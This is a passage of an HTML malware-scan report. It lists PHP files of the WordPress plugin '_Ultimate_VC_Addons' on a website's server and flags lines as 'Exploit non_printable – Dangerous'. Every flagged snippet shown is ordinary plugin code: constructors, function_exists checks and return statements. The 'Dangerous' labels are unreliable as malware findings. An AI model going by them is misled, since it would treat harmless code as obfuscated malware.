</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 137</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_responsive_param_media</span><span style="color: #007700">(</span><span style="color: #0000BB">$class</span><span style="color: #007700">, </span><span style="color: #0000BB">$dashicon</span><span style="color: #007700">, </span><span style="color: #0000BB">$key</span><span style="color: #007700">, </span><span style="color: #0000BB">$default_value</span><span style="color: #007700">, </span><span style="color: #0000BB">$unit</span><span style="color: #007700">, </span><span style="color: #0000BB">$data_id</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_units</span><span style="color: #007700">(</span><span style="color: #0000BB">$unit</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 156</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_admin_responsive_param_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_responsive_callback</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_342").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Font_Manager_Param.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.46 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_343" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_Font_Manager_Param'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_Font_Manager_Param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Font_Manager_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_google_fonts_settings</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_google_fonts_style_settings</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_343").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_ParamHeading.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.31 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_344" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_ParamHeading_Param'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_ParamHeading_Param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_ParamHeading_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_param_heading_callback</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_344").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Margin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.58 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_345" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_Margin_Param'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_Margin_Param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Margin_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_margins_param</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_345").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Icon_Manager_Param.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.53 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_346" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_Icon_Manager_Param'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_Icon_Manager_Param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Icon_Manager_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_manager</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 85</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_346").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Button.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.22 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_347" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_Button_Param'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_Button_Param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Button_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">button_prev_param</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_347").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Select.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.09 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_348" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_Select_Param'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_Select_Param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Select_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">select2_param</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
